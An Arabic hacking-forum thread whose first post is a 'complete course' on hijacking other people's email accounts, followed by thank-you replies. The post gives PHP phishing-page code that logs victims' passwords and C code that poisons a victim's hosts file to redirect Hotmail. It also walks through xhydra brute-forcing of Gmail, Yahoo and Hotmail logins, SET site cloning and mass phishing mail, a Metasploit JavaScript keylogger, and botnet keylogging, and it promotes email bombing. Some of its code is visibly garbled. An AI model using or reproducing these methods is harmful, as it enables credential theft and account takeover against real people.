الشــامل لاختراق الايمـيلات

الشــامل لاختراق الايمـيلات


صفحة 1 من 3 123 الأخيرةالأخيرة
النتائج 1 إلى 10 من 25

الموضوع: الشــامل لاختراق الايمـيلات

  1. #1

    افتراضي الشــامل لاختراق الايمـيلات




    موضوعنا تعبر دورة شامله للتعرف على اهم طرق اختراق الايميلات اهداء الى جميع اعضاء المنتدى


    السلام عليكم ورحمة الله وبركاته الهدف من االموضوع ليس الشرح التفصيلى

    والتطبيق الاعمى مع العلم ان الموضوعات منتشره على شبكة الانترنت لكن الهدف هو الفهم والفهرسة

    بمعنى اصح ان (اننا نتحدث عن الفكرة وترك التطوير والتفاعل لك واستغلال الفهم وتطويرك لها هو اهم شى

    بمعنى انك لديك الفدرة على استغلال وتطوير طرق افضل بجمع بين الاساليب المختلفه
    مثالا ان تستخدم الباك تراك بجانب
    برامج الويندوز العادية فى الخداع والتلغيم بحيث تجمع
    بين الافكار وتقوم بتطوير ما هو افضل وليس انا اعطيك

    ((ووجهة نظرى ان التطوير يبداء بفكرة بسيطة وينتهى اللى افــــاق واسعة لا حدود لها ))


    الطرق العادية باستخدام الويندوز



    اولا الاختراق من خلال الصفحات المزوره
    وتختلف الطرق ولكن الهدف واحد هو الحصول على الباسورد من خلال تسجيل الضحيه (اى كل الطرق تودى الى رومــأ )
    وتنقسم الى
    1_عمل صفحة مزوره بدون برنامج
    2-صفحات مزوره جاهز على شبكة الانترانت موجود بكثرة(هو عبارة عن سكريبت بيه مواقع صفحات مزوره للمواقع التواصل الاجتماعية وغيرها )
    3- عمل صفحة مزوره من خلال برنامج والبرامج موجوده من العصر الحجرى مثال على ذلك
    Login Spooferو Bazooka

    ا-عمل صفحة مزوره بدون برنامج

    والفكرة هى التلاعب بصفحة ورفعها على استـضافة (باختصار)
    التفصيل
    اولا تقوم بفتحة مفكرة وتكب الكود التالى

    [PHP]

    <?php
    $handle = fopen("pass.txt", "a");
    foreach($_GET as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
    $redirect = "ضع هنا رابط الموقع الحقيحقي";
    header("Location:$redirect");
    }
    fwrite($handle, "\r\n");
    fclose($handle);
    exit;
    ?>

    [PHP/]
    وبعدين
    وبعدين
    Php تقوم بحفظه باى اسم شرط امتد اد
    ليكن
    Next.php
    بعدين
    عمل مفكرة اخرى باسم
    Pass.txt
    وبعدين بتنزل الصفحة المطلوب عمل نسخة مطبقة مزوره لها لتكن
    Facebook
    بعد التنزيل تحفظ الصفحة وتقوم بتعديل عليه من خلال فتح بواسطة مفكرة او ورد باد
    اولا نبحث عن كلمة
    get ونستبدلها بكلمة post
    ثانيا نبحث عن كلمة
    Next.php التى يلها اللينك الموقع الاساسى ونسبتدلها Action

    ويتم التعديل للاتكون كلاتى

    [php]"get" action="Next.php"[PHP/]

    بعدين رفع على موقع استضافة مجانيه وللمعرفة باسورد اى حد دخل على الصفحة هتقوم بفتح مسار
    Pass .txt





    ب-نفس الطريفة بس فكرة تانى

    بعد تحميل الصفحة نحذف سكريبات اللى مش مهمه
    وبعدين نعمل ملف ليكن اسمو
    Pass
    ونعمل بداخله ملفين
    الاول بى اتش بى ده لنقل المعلومات من صفحة اتش تى ا مال
    Pass.php وده الكود يتم حقظها بامتدد ليكن اسمو

    كود PHP:
    html>>

    <head>
    <title> Man oF Impossple</title>
    <head>
    <body>
    <?php
    $_var
    ="E-mail: ".$_post["pass"]."pass: ".$post["email"]
    $_hand=fopen("pass.txt"."a")
    fwrite($_hand.$_var);
    fclose($_hand);

    ?>
    </html>
    والثانى ملف يتم تخزين الباسورد فيه
    ليكن
    Pass.txt
    ويتم التعديل على الصفحة كلاتى





    خد بالك دى اهم معلومة المتغير الذى سوف يحفظ فيه الاسم






    2- عن طريقة التخمين

    وفى وجهة نظرى المتواضعه انها طريقة عقيمــه ليس لها اهمـية لكن سنتاولها باختصار
    التخمين (عند اختراق لاايميلات وليس التخمين على المواقغ)
    هو عبارة عن ادة او برنامج يقوم بتجريب قائمة من الباسوردات ولابميلات (باسورد ليست وايميل ليست)
    كل ما نفعله هو وضع الايميل المراد التخمين ووضع قائمة باسوردات المحتمل ان يضعها الضحيه
    مثال
    ارقام تليفونات اسم او عنوان او كناية الضحيه يقوم البرنامج بتجريب حتى يصل اللى الباسورد الصحيه

    مثال على الباسورد ليست والايميل ليست مثالا للتخمين على عدد من الايميلات




    ومن اهم هذا الادوات او البرامج
    (brute force)
    مثال للتخمين كما فى الصورة










    3-عن طريقة سحب الباسوردات الموجود فى المتصفحات
    وهناك برامج وطرق كثير

    برنامج
    Webbrowserpassview
    (البرنامج والفكرة مطروح لستكمال الموضوع فقط)
    والبرنامج مش محتاج شرح بس مشكلة البرنامج انك لزم تحطو على جهاز الضحيه يعنى
    هو يسجل مع نفسو(طرحى للفكرة من باب العلم فقط وانا برى من من يجربها من باب التجسس على جيرانه او اخواتها اوشخص فريبها ليس لديه خبرة والمسلمين كافة اللهم بلغت اللهم فأشهد انى برىْ

    مثال توضيحى






    4-برامج الكاى لوجر


    اولا ما هو الكاى لوجر
    هو برنامج اختراق يقوم بتسجيل بيانات الدخول المختلفه للضحيه وتسجيل مع يقوم بكتابتها عند فتحه للسيرفر ويرسله للمخترق .

    يوصل التبليع للمخترق بطرق مختلفة منها الكاى لوجر لذ يرسل على الايميل
    والاخر على قاعدة بيانات تسجيل يتم رفعها على استضافة تكون ملحقها مع الكاى لوجر وهناك بعض الانواع تشمل الاثنين معــا

    مثال على النوع الاول برنامج البرنامج بسيط مش محتاج شرح

    Emissar keylogger

    1-ايميلك اللى هيوصل عليه التبليغ
    2-الباسورد
    3-اختبار التبليغ
    -اسم السيرفر والباقى عبارةالخصائص 6- ورسالة التى تظهر فتح الضيحه السيرفر اذا ارد ذلك









    النوع الثانى من الكاى لوجر من خلال قاعدة بيانات تسجيل ترفع على استضافة
    وكم قولنا فى السابق يكون مرفق مع البرنامج اقعدة البيانات تقوم برفع واخد العنوان او اللينك
    1-لينك الصفحة
    2-فى حال تريد دمج السيرفر
    3-تغير ايقونة السيرفر
    مثال على ذلك النوع برنامج
    iStealer 6.3 Legends



    النوع الثالث
    ممكن على الايميل او على على قاعدة بيانات









    5-عن طريقة تزييف الدومينات فى جهاز الضحيه


    وهى عن طريقة التلاعب بالدومين فى جهاز الضحيه اى عند دخول على الموقع الاساسى يقوم بنقلها مباشرة اللى الموقع المزوز بحيث لا يشعر الضحيه ذلك من خلال ادة تغير الهوست من جهاز الضحية

    ادة من برمجة
    الاح شــاجع
    والامانة العلمية تطلب انا اذكر اسم المبرمج
    يتم تصيميمها بـلغة سى بلس بلس

    Microsoft Visual C++ 6.0

    اولا تقتح البرنامج
    وتختار
    File
    ثم
    New
    ثم
    File
    وبعدين
    Cc++ source file
    وتختار اسم بعدين تحدد مكان الحفظ
    كود الادة
    مثال الادة على الهوتميل
    كود PHP:

    #include<stdio.h>
    void main(){
    FILE *f;
    f=fopen("C:\\WINDOWS\\system32\\drivers\\etc\\hosts","a");
    fprintf(f,"\n  الاى بى بتاعكwww.hotmail.com\nالاى بى بتاعكhotmail.com");
    fclose(f);
    //programmed by shaja

    طريقة عمل لادة
    وده المسار اللى بتقوم بتغيرو الادة
    مسار الهوست ده بيكون السبب فى انخداع الضحية

    \C:\ wINDOWS\system32\drivers\etc
    hosts فى ملف الهوست

    127.0.0.1 localhost

    بيظهر تحتو مواقع اخر مثالا
    192.168.73.18.155 www.hotmail.com
    ?





    ألطريقة السادسة من خلال البوت نت الذى يدعم الكاى لوجر
    طبعا بعد عمل السيرفر بوت نت وارسالها للضحية وفتح الضحيه له سيصل التلبليغ وكل ما عليك هو تحديد الضحيه وضغط علامة (صح) عليه شرحى
    وسنطرح مثال بسيطة هو البوت نت
    VertexNet
    طبعا ان عندى بوت جاهز دى صورة صفحة الدخول



    بعد الدخول سنتعرف على خواص البوت وما يهمنا هو الامرين التاليين الكاى لوجر وكيفية تشغيلها



    وامر سحب بيانات الت قام الكاى لوجر بتسجيلها




    لارسال الامر True طبعا بعد الاختراق ما عليك الا انك تكتب الامر



    وتسحب بيانات الدخول









    عارف انك تعبت من قراة الموضوع ههههه لكن هى تعتبر موسعة ودورة كامل

    تابع معايه

    اخر طريقة

    وهذا الطريقة لا تعتبر طريقة اخترق وهى طريقة تعتمد على اغرق الايميل بكم هائلة من الرسائل التى تجعل الضحيه
    لا يستطيع فتح صندوق الرسائل وقد تودى فى بعض الاحيان الى غلق الايميل وتعليقه خين تصل الرسائل لعد معين

    البرنامج المستخدم +اثبات فعالية من جهازى

    GTMailer SMS Bomb



    النتيجة









    الجزء الثانى الاختراق من خلال الباك تراك
    هدفى فى ذكر الطرق شى واحد فقط قعالية كل طريقة لا غير اما التوضيح فستجدونا الشرح كل طريق بتفصيل اما فى اليوتيوب او البركة فى اعضاء المنتدى

    الطريقة الاولى
    كود PHP:
    الـتخمين
    xhydra بـٌواسطه أدآه
    نــُدخل بــُآلمــُوضوع بــُدون مــُقدمآت
    Gmailالــُتطبيق ليــُكون عــُلى الــ ُ
    xhydra  نــُفتح ادآه

    بــُعد فــُتح الادآه 
    نعدل  الاعــُدآدادت كلاتى
    Target
    Single target 
    smtp.gmail.com
    port 
    465
    Protocol 
    smtp
    Password 
    Username 
    ايميل الضحية 
    Password 
    List > اختر ملف الي فيه الباسوردات(سوف ادرجه في نهآية الموضوع)
    try 
    Login as password خلي علآمه صح على >
    start
    start ضغط على كلمه
    وننتضر لحين ينتهي التخمين واضهار باسورد الدخول 
    ولو كنت تريد التخمين على الياهو 
    نفس الاعدادات فقط غير 
    Single target 
    smtp.gmail.com
    الى 
    Single target 
    smtp.yahoo.com
    وأذآ كآن Hotmail
    نغير البورت 
    الى
    port 
    587
    ونغير
    Single target 
    smtp.live.com
    ملف الباسورد ليست 
    [ غير فعـــاله بنسبة كبيره]








    الطريقة الثانية
    كود PHP:
    عن طريقة صفحة مزوره مثالا على الفيس
    اولا نفتح الادة
    Set
    طبعا اول ما تشغلها رح يظهر لك الواجهة الرئيسية للاداة ومنها الخيرات لبدء العمل
    اختار الخيار الثاني من القائمة
    W e b s i t e Attack Vectors
    ومن ثم نختار الخيار الثالث من الخيارات المتوفرة
    Credential Harvester Attack Method
    الان نختار الخيار الثاني وهو 
    :
    Site Cloner
    ونقوم بادخال مسار الموقع ويجب ان يكون هنالك مكان لتسجيل الدخول في الصفحة المحددة
    مثلا فيسبوك بمكنك تسجيل الدخول من الصفحة الرئيسية 
    www
    .facebook.com
    اما ياهوو فلا يمكنك لذلك نأخذ رابط الصفحة التي تستخدم للتسجيل
    https
    ://login.yahoo.com/config/login
    ونفس العملية مع جيميل
    https
    ://www.google.com/accounts/ServiceLogin
    الان نكمل الشرح بعد ادخال الرابط لصفحة التسجيل نقوم بالضغظ على انتر لتبدأ عملية الانشاء
    للأستمرار اظغط زر انتر
    هنا الاداة انتهت من عملها وتخبرك ان الصفحة المزورة موجوده على ايبي جهازك خلف البورت 80 
    (بورت المتصفح)
    كل ما عليك فعله هو فتح البورت 80 في الراوتر ونسخ الأيبي الخارجي حقك ومن ثم عمل توهيم باستخدام موقع
    http
    ://tinyurl.com/
    وهذا الموقع جيد ايظا يعطيك اسم دومين للرابط
    http
    ://www.dot.tk/en/index.html?lang=en
    لايهام وخداع الضحيةسارها 
    [ فـــــــعاله بنسبة 100% ]








    [PHP]الطريقة الثالثة


    استغلال اداة [ msfpro ] [ + ] وسحب الـ [keylogger ]

    بنستخدم سكريبت معين

    دور طبعا على السكريبت هتلاقيه
    تابع الاتي

    msfpro

    واضغط على

    Enter

    use auxiliary/server/capture/http_javascript_keylogger
    وبعدين

    [ Enter ]

    show options

    وبعدين

    Enter

    [ run ]

    واضغط على

    [ Enter ]


    [ تمام دلوقتى انسخ الايبي ونعدل على السكريت

    غير > xxxx الى الايبي حفكـ
    النتيجه

    يقوم بستخرج اليوزرات والباسودات

    [PHP/]

    [ فـــــــعاله ]












    الطريقة الرابعة

    فتح ادة
    set

    طبعا اول ما تشغلها سوف يظهر لك الواجهة الرئيسية للاداة ومنها الخيرات لبدء العمل
    اختار الخيار الثاني من القائمة

    ااو غتح الادة سثغ مباشر

    نختار5
    Mass Mailer Attack

    بعدين1
    Use a GMAIL Account for your email attack.

    بعدين هتظهر
    Enter who you want to send email to

    To ايميل الضحية
    Enter your GMAIL email address: الايميل

    Enter your password for gmail :باسورد:

    Do you want to flag this message/s as high priority? yes or no: Yes

    Website Attack Vectors

    وبعدين
    3. Credential Harvester Attack Method
    بعدين

    1. Web Templates

    بعدين بتختار اللى عايزو سوا تويتر او فيس او هوت ميل
    وبعدين انتر
    وتنتظر فتخ الضخيه الرسالة وتسجيل البيانات

    اهم جزء
    لزم تظهر دى دليل نجاح الارسالة[*] SET has finished sending the emails.
    ملحوظة وضع لينك الصفحة المزوره فى الرسالة



    طريقة ليس لها اهمية فى نظرى المتواضع كانك ارسالة رسالة صفحة مزوه لشخص
    لكن بدل انا تستخدم الايميل مباشر استخدم الباك تراك







    [PHP]
    الطريقة السادس

    سحب الايميلات على دومين [ + ] [ Back Track ]
    تابع الاتي
    [ msfconsole ]
    بعدين
    [ Enter ]
    [ use gather/search_email_collector ]
    وبعدين
    [ Enter ]
    [ set DOMAIN hotmail.com ]
    وبعدين
    [ Enter ]
    [ ملاحظه غير الدومين الي تبيه ]
    [ النتيجه ]

    [/PHPCODE]

    [هى مجرد طريقة للسحب وليس لها اهمية تم وضعها لاستكامل فثط ]








    دورتى للبوت نت على قناتى

    http://www.youtube.com/playlist?list...XHAzp3OPOed28W

    + مكتبة الدينيه الشامله ستجدها ايضا فى القناة اسف على اى اخطاء املائية

    وان عجبك الموضوع اترك بصمتك بتقيم او شكرا






    ˙·٠•● SƲƤЄَƦ_HAƈƈƈُƈƇƇcƘЄَƦ ●•٠

    عذرا على عدم الرد على البعض والدخول النادر اوالمتقطع لا اسالكم الا دعوة بالتوافيق فى الامتحانات سامحونى جميعا
    ·˙ ..


  2. #2

    افتراضي رد: الشــامل لاختراق الايمـيلات

    مشكوور يا غالي

  3. #3

    افتراضي رد: الشــامل لاختراق الايمـيلات

    العفو يا غالى يشرفنى مروك
    التعديل الأخير تم بواسطة super_haker2002 ; 03-04-2014 الساعة 01:06 AM




    ˙·٠•● SƲƤЄَƦ_HAƈƈƈُƈƇƇcƘЄَƦ ●•٠

    عذرا على عدم الرد على البعض والدخول النادر اوالمتقطع لا اسالكم الا دعوة بالتوافيق فى الامتحانات سامحونى جميعا
    ·˙ ..


  4. #4

    افتراضي رد: الشــامل لاختراق الايمـيلات

    الف شكر لك..

    لي رجعه

    - - - تم التحديث - - -

    يعطيك العافيه ي وحش ..

    فهرسة جميله جدا , اشكرك ع طرحك
    أستفدت منها كثير

    + تم التقييم
    * I entered this world and I would be a danger to every someone malignant. Did not embrace it myself!

    ( وآو )

    BBM : 7A021D53

    لتبآدل الخبرات,

  5. #5

    افتراضي رد: الشــامل لاختراق الايمـيلات

    جزاك الله كل خير أخى

  6. #6

    افتراضي رد: الشــامل لاختراق الايمـيلات

    جميل والله

  7. #7

    افتراضي رد: الشــامل لاختراق الايمـيلات

    اقتباس المشاركة الأصلية كتبت بواسطة gamal1 مشاهدة المشاركة
    جزاك الله كل خير أخى
    مشكور على اخى على مروك

    - - - تم التحديث - - -

    اقتباس المشاركة الأصلية كتبت بواسطة MasteR HunteR مشاهدة المشاركة
    جميل والله
    انت الاجمل يا غالى




    ˙·٠•● SƲƤЄَƦ_HAƈƈƈُƈƇƇcƘЄَƦ ●•٠

    عذرا على عدم الرد على البعض والدخول النادر اوالمتقطع لا اسالكم الا دعوة بالتوافيق فى الامتحانات سامحونى جميعا
    ·˙ ..


  8. #8
    هكر نشيط الصورة الرمزية merzougui hacker
    تاريخ التسجيل
    Nov 2013
    الدولة
    بلد الرجال بلد المليون ونصف مليون شهيد
    المشاركات
    166

    افتراضي رد: الشــامل لاختراق الايمـيلات

    جزاك الله خير تحية لك hacker_super

  9. #9

    افتراضي رد: الشــامل لاختراق الايمـيلات

    اقتباس المشاركة الأصلية كتبت بواسطة merzougui hacker مشاهدة المشاركة
    جزاك الله خير تحية لك hacker_super
    وجزاك الله بمثل تسلم يا غالى




    ˙·٠•● SƲƤЄَƦ_HAƈƈƈُƈƇƇcƘЄَƦ ●•٠

    عذرا على عدم الرد على البعض والدخول النادر اوالمتقطع لا اسالكم الا دعوة بالتوافيق فى الامتحانات سامحونى جميعا
    ·˙ ..


  10. #10

    افتراضي رد: الشــامل لاختراق الايمـيلات

    مشكووور يا اخي على الموقع الجميل

صفحة 1 من 3 123 الأخيرةالأخيرة

المواضيع المتشابهه

  1. دورة Hcj لاختراق المواقع
    بواسطة Black Storm في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 16
    آخر مشاركة: 09-14-2013, 10:06 AM
  2. موقع لاختراق الفيس بوك
    بواسطة قناص~الغلا في المنتدى منتدى إختراق البريد والايميلات
    مشاركات: 25
    آخر مشاركة: 11-24-2012, 04:48 AM
  3. اكو برنامج لاختراق البوكر ؟
    بواسطة هتلر العراق في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 0
    آخر مشاركة: 09-12-2012, 04:32 PM
  4. كل ما تحتاجه لاختراق الاجهزه
    بواسطة sTeEeF-511 في المنتدى قسم اختراق الأجهزة
    مشاركات: 5
    آخر مشاركة: 07-20-2010, 06:50 PM

الكلمات الدلالية لهذا الموضوع

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •